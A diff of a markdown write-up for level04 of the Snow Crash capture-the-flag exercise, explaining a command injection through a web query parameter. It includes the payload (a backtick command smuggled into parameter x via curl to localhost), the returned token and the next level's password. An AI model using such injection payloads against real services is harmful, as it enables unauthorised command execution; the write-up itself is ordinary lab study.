rertzer/ft_cybersecurity_projects/snow_crash/level04.md

 </VirtualHost>
 ```

+> Notice that there is also an Apache conf file for level12.

 ## `getflag` over IP

-- As the parameter x is in a shell command executed as flag04, we can try a command injection to execute the getflag program:
+- As the parameter x is in a shell command executed as `flag04`, we can try a command injection to execute the `getflag` program:

 ``level04@SnowCrash:~$ curl 'localhost:4747?x=`getflag`'
 Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap``

-# Getflag
+# Flag

 - level05 password (flag): `ne2searoevaevoem4ov4ar8ap`